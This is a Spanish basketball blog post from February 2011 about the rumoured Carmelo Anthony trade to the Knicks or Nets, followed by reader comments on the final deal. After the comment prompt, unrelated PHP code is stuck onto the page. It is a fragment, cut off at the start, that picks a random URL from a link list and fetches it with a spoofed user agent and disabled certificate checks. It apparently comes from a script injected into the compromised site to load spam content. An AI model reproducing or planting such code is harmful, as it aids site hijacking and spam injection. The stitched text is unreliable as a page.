Día clave para el traspaso de Carmelo

21 de February de 2011 por txusma

El protagonista de este All Star no ha sido John Wall, ni Kobe Bryant, ni siquiera Blake Griffin, que no se ha perdido ninguno de los días del evento. El jugador más buscado ha sido, sin duda, Carmelo Anthony y no precisamente por su buen papel en el partido de las estrellas.

Durante todo el fin de semana se han ido sucediendo los rumores acerca de su traspaso. Carmelo Anthony sigue prefiriendo recalar en los Knicks pero a los Nuggets parecen gustarle más la oferta de los Nets. En estos momentos, la clave para la llegada de Carmelo a los Knicks es un jugador interior, joven y ruso. Increiblemente hablamos de Timofey Mozgov. La franquicia de la Gran Manzana ha presentado una última oferta por la cual enviaría a Danilo Gallinari, Wilson Chandler, Raymond Felton y la 1ª elección de 2014 a los Nuggets y a Anthony Randolph y Eddie Curry a los Wolves. A cambio recibirían a Carmelo Anthony, Chauncey Billups, Renaldo Balkman y Shelden Williams. El problema es que Denver está emperrado en recibir también a la joven perla rusa o en sustituir a Gallinari por Fields+Mozgov. Si los Knicks se decidieran a incluirlos, el traspaso se cerraría inmediatamente pero parece que Walsh y D’Antoni no estan por la labor.

La oferta de los Nets la conforman Derrick Favors, Devin Harris, Troy Murphy y 4 primeras rondas de draft. La franquicia de Mikhail Prokhorov recibiría a cambio a Melo, Billups, Williams, Ely y Balkman. Parece ser que hoy es la fecha límite que se ha marcado Carmelo para informar a los Nets si acepta firmar, tras el traspaso, una extensión de 3 años y 65 millones de dólares.

Quedan sólo 2 días para que se acabe la fase de traspasos y todo es posible. Incluso, ¿porqué no?, que Carmelo se quede en los Nuggets.

Comenta

6 comentarios a esta entrada

  1. Vader dice:
    #1

    El último rumor es que si Carmelo va a los Knicks inmediatamente los Nuggets traspasarian a Gallinari, Mozgov, Chandler o Felton a los Nets a canvio de Favors, Murphy y dos primeras rondas. Puede ser cierto o puede ser un farol de los Nets & Nuggets para acobardar a los Knicks para que finalmente no realizen la oferta que les pide Denver. Recordad que los Nuggets prefieren sin dudar la oferta de los Nets por Carmelo.

    Ahora mismo y viendo hasta que punto se ha llegado parece claro dos cosas; Carmelo quiere la extensión de contrato y quiere ir a los Knicks. Y parece que los Knicks tendran que aceptar las exigencias de Denver porque se ha llegado muy lejos y el ambiente en New York se podria enrarecer bastante si finalmente no fichan al jugador y este acaba en los Nets…

    Vamos a ver porque la trama se complica XD Ver a todos estos jugadores de los Knicks el dia de mañana triunfando en los Nets tambien seria duro para los Knicks… aunque claro con Stoudemire y Carmelo en el equipo seguro que las penas se pasan mejor.

    Saludos

      Citar

  2. KB # 24 dice:
    #2

    Por el bien de los Knicks, de la Nba y por el de sus aficionados, espero que Melo no sea un pestero y firme en junio, así podremos ver unos knicks con un equipazo. Por el contrario, si los knicks se hipotecan y se lo juegan todo por Carmelo no sé si será su mejor negocio

      Citar

  3. Vader dice:
    #3

    @KB24

    Eso seria ideal pero es díficil que ocurra y la culpa es la amenaza de lockout. Es comprensible que Carmelo quiera firmar la renovación, estamos hablando de jugarse unos 50 millones de € si de aquí al verano tuviera una lesión…

    Hay que traspasar a muchos jugadores pero yo soy partidario del traspaso. Con Gallinari, Felton y Chandler podras clasificarte para playoff pero no puedes aspirar a nada más. Con Stat y Carmelo en el equipo te queda mucho trabajo por delante para rodearlos bien pero esa parte es más fácil, lo complicado es poder juntar dos estrellas de este calibre. Quizas lo mejor que podrian hacer si consiguen a Carmelo es renunciar a otra superestrella y fichar el proximo verano 3 o 4 jugadores de primer nivel con el espacio salarial que les quede. Un base correcto, un buen pivot y un par de jugadores que mejoren el banquillo que tampoco no es muy difícil.

    Si despues de Carmelo van a por Howard, Williams o Chris Paul esta claro que el resto del equipo seria muy mediocre. Esa “carta” (juntar 3 superestrellas) sólo me la jugaria para traer a Howard. Con Carmelo por fuera y dos torres como Stat y Howard casi daria igual el resto del equipo… sólo haria falta fichar tios que tirarn bien de 3. Carmelo creando juego, las dos bestias por dentro y el resto del equipo esperando abiertos su tiro… Ayyy que bonito es soñar XD

    Saludos

      Citar

  4. Viva_Dirk dice:
    #4

    No creo que crear juego sea una de las virtudes de Carmelo, desde luego necesitarian un base distribuidor y que pueda anotar los tiros abiertos, aunque si Billups le acompaña lo tienen hecho. Billups-Fields-Carmelo-Stoudemire-Turiaf es un comienzo, el juego interior se queda cortísimo pese a que D’Antoni pueda utilizar a cualquier alero de falso 4 puntualmente, por ahí deberia llegar la mejora, ya que Douglas es un buen base suplente y exteriores apañados hay mas.

    Lo Knicks tendrian que ir apuntalando el equipo a base de la mid level y elecciones del draft, porque recibiendo a Melo con la extensión firmada y a Billups, se plantan con cerca de 40 kilos garantizados en 2 jugadores, Billups cobrando 14 la temporada que viene, aunque realmente podria firma algo como 20 millones y 3 años seguiria sin haber hueco para contratos mayores de la mid level.

      Citar

  5. Vader dice:
    #5

    Bueno ya esta hecho… Carmelo a los Knicks!!! Brewer de los Wolves tambien, es un traspaso a tres bandas.

    Saludos!!

      Citar

  6. Busky23 dice:
    #6

    Pues si,parece que el culebrón Carmelo por fin acabó,tal y como él quería,rumbo a los knicks y con la extensión de 65 millones bajo el brazo.
    El puzzle queda así :
    Denver Nuggets reciben a Danilo Gallinari, Wilson Chandler, Raymond Felton, Timofey Mozgov, la 1ª ronda 2014 de los Knicks, la 2ª ronda de 2012 de Golden State Warriors, la 2ª ronda de 2013 también de los Warriors y 3 millones de dólares. También reciben a Corey Brewer desde Minnesota.

    New York Knicks reciben a Carmelo Anthony, Chauncey Billups, Shelden Williams, Anthony Carter y Renaldo Balkman. 

    Minnesota Timberwolves recibirán a Anthony Randolph y Eddy Curry,que será cortado.

    Vuelta a empezar para los Knicks,tres titulares fuera y se quedan con Stat como 5,un precio demasiado caro,pero el que no arriesga,no gana.
    Cual será el plan b de los Nets? Cuantos jugadores de los que han llegado a Denver acabarán saliendo antes de debutar?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>